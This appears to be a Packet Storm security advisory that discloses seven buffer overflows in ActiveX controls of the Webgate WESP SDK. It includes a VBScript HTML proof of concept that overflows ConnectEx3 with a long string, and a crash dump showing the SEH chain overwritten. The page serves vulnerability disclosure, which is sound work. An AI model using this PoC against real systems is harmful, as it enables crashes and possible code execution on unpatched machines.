what you don't know can hurt you

Webgate Buffer Overflow

Webgate Buffer Overflow
Posted Feb 24, 2015
Authored by Praveen Darshanam

Various Webgate technology suffers from multiple buffer overflow vulnerabilities.

tags | exploit, overflow, vulnerability
SHA-256 | 6d6a87e39a520ec98120ccff8b68f26b54ef6465769b821e910397fd5a27aa7e

Webgate Buffer Overflow

Change Mirror Download
Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.

WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both
network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage
Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword
Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX
LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX
Connect Buffer Overflow
Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect
Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX
ConnectEx3 Buffer Overflow


CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As
String , ByVal Port As Integer , ByVal UserID As String , ByVal Password
As String , ByVal extcompany As Long , ByVal authType As Long , ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
******************************
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From Returns To
--------------------------------------------------
msvcrt.76ACD33D WESPPlayback.999539
WESPPlayback.999539 41414141
41414141 22E5E0
22E5E0 2F712C
2F712C 41414141
41414141 41414141
41414141 41414141
41414141 41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX] <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]

P.S. CERT tried to coordinate with the vendor for fixing the issues but
there wasn't any response from vendor

Best Regards,
Praveen Darshanam


Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    12 Files
  • 27
    May 27th
    12 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close